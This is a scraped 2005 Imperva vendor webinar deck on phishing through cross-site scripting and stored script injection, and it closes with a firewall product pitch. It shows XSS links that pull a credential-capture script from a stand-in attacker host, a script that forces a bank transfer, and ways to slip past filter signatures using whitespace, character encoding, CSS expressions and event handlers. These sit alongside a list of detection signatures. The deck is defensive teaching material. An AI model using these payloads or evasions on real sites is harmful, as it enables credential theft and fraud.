370 likes | 506 Views
Phishing: When Attacks Get Embedded in Legitimate Websites. Live Webinar May 26, 2005. A Word from our Sponsor Imperva. Mission Secure the Data Center Product SecureSphere Dynamic Profiling Firewall Protects proprietary information, custom business applications, and critical servers
E N D
Phishing: When Attacks Get Embedded in Legitimate Websites Live Webinar May 26, 2005
A Word from our SponsorImperva Mission Secure the Data Center Product SecureSphere Dynamic Profiling Firewall • Protects proprietary information, custom business applications, and critical servers • Addresses phishing, identity theft, data theft, malicious robots, worms, denial of service, and SQL injection • Stops web attacks, database breach, and worm infection Data Center Internal Users Proprietary Information Custom Business Applications and Critical Servers SecureSphere Gateways SecureSphere Management Server Imperva Confidential
Today’s PresenterAmichai Shulman - CTO of Imperva Amichai Shulman • Lecturer on Info Security for Technion - Israel Institute of Technology • CTO of Edvice, security consultant to banks and financial services firms • Leads the Application Defense Center (ADC) Application Defense Center (ADC) • Attack and defense techniques presented today are the result of research done at Imperva’s Application Defense Center ADC Data Center Security Series • Monthly live webinars on attacks targeting corporate data centers • “Identity Theft” on 6/23 - register at impervaevents.webex.com Imperva Confidential
PhishingAgenda • What is Phishing • Sizing the Threat • Types of Phishing (demo) • Commonly Proposed Solutions • Phishing Techniques • Cross Site Scripting Phishing (demos) • Script Injection Phishing (demo) • Phishing Defenses • Traditional Defenses • Evasion Techniques • Alternative Solutions Imperva Confidential
Phishing ThreatWhat is Phishing? • Phishing = Social Engineering + Technical Subterfuge • Objective • Steal victim’s credentials • Commit crimes using stolen credentials • Delivery Mechanism • Spoofed E-mail (or website or IM or Weblogs) • Link Sends User to… • Bogus Website Phishing • Real Website Phishing Imperva Confidential
Phishing ThreatHow Significant? • 64 brands reported hijacked by Phishing in Feb., 05 • Dramatic growth over past 2 years • Attack Implications • Lost Revenue • Brand Erosion • Regulatory Issues • GLB • SoX • CA 1386 • HIPAA Source: antiphishing.org Imperva Confidential
Bogus Website Phishing Attack Stealing login and password
Bogus Website Phishing The Bait • Use social engineering (such as email) to get the victim to click on a link with attack Imperva Confidential
Bogus Website Phishing Attack - Easy to Detect • Manual Solutions • User education • User looking at URL sees the website is fraudulent • Automated Solutions • Industry efforts for strict server authentication • Ex. client side plug-ins (TrustBar, NetIBA, etc.) http://www.attacker.com Imperva Confidential
Real Website Phishing Demonstration Stealing login and password T
Proposed Solutions for Phishing Problem Are they sufficient?
Real Website Phishing ThreatProposed Solutions • User awareness • Real Website Phishing has the correct URL and real certificates • Server authentication • Real Website Phishing attacks will authenticate correctly • Hardware Tokens • Real Website Phishing attacks are run on victim’s system • Time sensitive or one-time use passwords • Real Website Phishing can exploit the credentials in real-time Imperva Confidential
Real Website Phishing ThreatPhishing Techniques • Cross Site Scripting • User interacts with real website • The malicious code is stored at theattacker’s site or in the link itself • Script Injection • User interacts with real website • The malicious code is stored inside thereal website’s application database Imperva Confidential
Cross Site Scripting How is it Done? • Attack code written in standard client side script language • E.g. JavaScript, VBScript, etc • Link in e-mail mixes calls to real website with attack code • Attack code could be invoked from attackers website • http://www.superveda.com/login.asp?return=javascript.src=http://www.attacker.com/logincapture.jscript • Attack could be completely incorporated into the link • http://www.superveda.com/dosearch.asp?return=<script> ATTACK </script> • Returned webpage mixes both real website and attack Imperva Confidential
Cross Site Scripting (XSS) Phishing Demonstration Stealing cookie credentials T
Script Injection How is it Done? • A close relative of Cross Site Scripting (XSS) • Difference is location of attack code • XSS - attacker’s website or in the malicious link • Script Injection - real web application’s database • Location makes all the difference • No action required by user • Attack runs when victim loads the web page • Link can be totally benign • Attack not in the link, the attack is in the site • Potentially liability for website owner since the attack is inside the website Imperva Confidential
Script Injection Phishing Demonstration Attack embedded in real website database T
Real Website Phishing ThreatAttacks Can Be Anything… • Steal user login credentials • Steal cookies credentials • Force victim to execute an action • Any action the victim is allowed to do on the website • Script injected in banking site to transfer funds: f = document.forms[‘transfer_money’] f.to_account.value = ‘Attackers Account’ f.amount.value = 1000000; f.submit() Imperva Confidential
Cross Site Scripting Phishing Demonstration (2) Victim unknowingly makes an purchase T
Traditional DefensesIdentifying Attacks • Attack contain <script>, javascript, or vbscript tags • Widely known attack vectors • <script>alert()</script> • <script src=“http://attacker/script.js”></script> • <img src=“javascript: alert()”> • <img src=“vbscript: alert()”> • Other HTML attributes may contain active code • <body background="javascript: alert()"> • <bgsound src="javascript: alert()"> • <iframe src="javascript: alert()”></iframe> Imperva Confidential
Traditional DefensesAre Signatures Enough? • Solution? • Signature based mechanism • Block all requests with specified text string • “<script>”, “javascript:” or “vbscript:” • NO! • Numerous ways to evade signature engines • Evasions exploit richness and lax parsing of HTML language Imperva Confidential
Signature Evasion Techniques Whitespaces Numerical Character Encoding CSS (Cascade Style Sheets) Event Handlers T
Evasion TechniquesWhitespaces • When between tokens or inside HTML strings, HTML parsers usually ignore line feeds, carriage returns, horizontal tabs and null characters • Instead of “javascript:” we can write J avasc ri p t: Imperva Confidential
Evasion TechniquesNumerical Character Encoding • Encode characters inside HTML strings as numerical values • Only the word string in <tag attribute=“string”> can be numerically encoded • Enables attack to evade detection of the “javascript:” pattern string by encoding one or more of its characters • 25 different ways to encode ‘j’: ‘j’ = j = j = … = j = j = j = … = j = = j = j ... • The semicolons are many times not required, so we get an even greater variety of encodings Imperva Confidential
Evasion TechniquesCSS (Style Sheets) • Style attributes can also be dynamically computed using JavaScript code: • <div style="width: expression(alert(‘Imperva’))"> • Style sheets need not be embedded in HTML code; it can be imported from another file, even on a different host (e.g, the attacker’s) using the <link> tag • In http://attacker/attack.css: p { background-image: expression(alert(“Imperva")); } • In the attack vector: <link rel="stylesheet" href=“http://attacker/attack.css"> <p></p> Imperva Confidential
Evasion TechniquesEvent Handlers • HTML event handlers are implicitly assumed to be in JavaScript, and therefore do not require the “javascript:” directive: • <body onLoad="alert(c)"> • <img src="http://wherever/doesnt_exist.jpg" onError="alert()"> • <marquee onStart="alert()"></marquee> • More: • <div style='position: absolute; left: 0px; top: 0px; height=1000px; width=1000px' onMouseOver="alert()"></div> • <table onMouseOver="alert()" height=1000 width=1000> • Many more event handlers (up to 80!) can be utilized Imperva Confidential
Evaluating Alternative Defenses Traditional Defenses Application Aware Defenses
Evaluating Alternative Defenses Traditional Defense • Apply very large set of signatures to ALL traffic • onLoad, onMouseOver, onFocus, … • <script>, <link>, <img>, style=, … • Many more we haven’t covered here • Problems • Easy to evade with client-side encoding features • e.g. whitespace, numerical encoding, etc • Multiple signatures have performance penalty • Multiple signatures results in false positives • Can not block everything that remotely resembles HTML (i.e. that have <angular> brackets or an equal sign) • In some places users are allowed to type in HTML code Imperva Confidential
Evaluating Alternative Defenses Application Aware Defense • Focus the search • Only inspect relevant fields • identify dynamic pages, parse HTTP correctly • Don’t bother with fields that normally accept scripts • e.g. forms that allows editing of HTML text • Detect attacks only if field contains suspicious characters • < > = & # etc. • Cover all cases • Normalize input using client-side decoding • Remove redundant white space and decode numerical HTML and style sheet encodings • Apply client side decoding only if required • Create a comprehensive set of signatures • Minimize performance penalty & maximize accuracy Imperva Confidential
SecureSphere Dynamic Profiling FirewallApplication Aware Defense • ADC Signatures • Comprehensive set of signatures • Dynamic Profiling • Identifies the relevant fields for signature checking • Automatically models the structure and dynamics of.. • Web Application: URLs, cookies, users, parameters, sessions, etc. • Database: SQL queries, tables, parameters, users, etc. • Automatically updated • ADC Signatures updated on regular basis • Dynamic Profiling automatically adapts to app/db changes Internal Users Data Centers SecureSphere Gateways SecureSphere Management Server Imperva Confidential
Thank You Imperva, Inc. 950 Tower Lane, Suite 1710Foster City, CA 94404 Sales: (866) 926-4678 www.imperva.com Imperva Confidential